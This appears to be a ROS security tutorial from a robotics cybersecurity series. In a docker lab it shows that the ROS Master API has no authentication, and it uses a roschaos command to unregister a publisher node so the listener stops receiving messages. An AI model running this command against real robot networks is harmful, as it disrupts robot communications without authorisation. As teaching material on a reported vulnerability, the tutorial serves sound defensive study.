Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 

\newpage

Unauthenticated registration/unregistration with ROS Master API

In this tutorial we'll review how the ROS Master API requires no authentication capabilities to register and unregister publishers, subscribers and services. This leads to a [reported vulnerability] (aliasrobotics/RVD#87) that can easily be exploited with off-the-shelf penetration testing tools by an attacker with access to the internal robot network.

This work is heavily based on [1],[3] and [4].


Note: as in previous tutorials, there's a docker container that facilitates reproducing the work of this tutorial. The container can be built with:

docker build -t basic_cybersecurity11:latest .

and run with:

docker run -it basic_cybersecurity11:latest

Let's start by listing the ROS Nodes and Topics participating in the network. After launching the container:

root@d64845e9601e:/# rosrun scenario1 talker &
root@d64845e9601e:/# rosrun scenario1 listener

Now, let's get a second command line into the simulated robotic scenario running over docker. To do so:

| => docker ps
CONTAINER ID        IMAGE                          COMMAND                  CREATED             STATUS              PORTS               NAMES
935c390c1e49        basic_cybersecurity11:latest   "/root/launch_script…"   20 seconds ago      Up 19 seconds                           vibrant_chandrasekhar

| => docker exec -it 935c390c1e49 /bin/bash
root@935c390c1e49:/#

On the second terminal of the same docker instance:

root@d64845e9601e:/# rosnode list
/listener
/publisher
/rosout
root@d64845e9601e:/# rostopic list
/flag
/rosout
/rosout_agg

We can see that there're several Nodes, we're mainly interested on /publisher and /listener. Both, exchanging information through the /flag Topic as follows:

root@d64845e9601e:/# rostopic echo /flag
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
data: "br{N(*-E6NgwbyWc"
---
...

Unregistering /publisher from /listener

root@655447dc534c:/# rosnode list
/listener
/publisher
/rosout
root@655447dc534c:/# roschaos master unregister node --node_name /publisher
Unregistering /publisher

You will see that the listener stops getting messages. If we now verify it:

root@655447dc534c:/# rosnode list
/listener
/rosout

We observe that the ROS Master does not find /publisher anymore, it's been unregistered. Furthermore, the process talker is still running:

root@655447dc534c:/# ps -e
  PID TTY          TIME CMD
    1 pts/0    00:00:00 launch_script.b
   31 pts/0    00:00:00 roscore
   42 ?        00:00:01 rosmaster
   55 ?        00:00:01 rosout
   72 pts/0    00:00:00 bash
   78 pts/1    00:00:00 bash
   90 pts/0    00:00:00 talker
  108 pts/0    00:00:01 listener
  174 pts/1    00:00:00 ps

Resources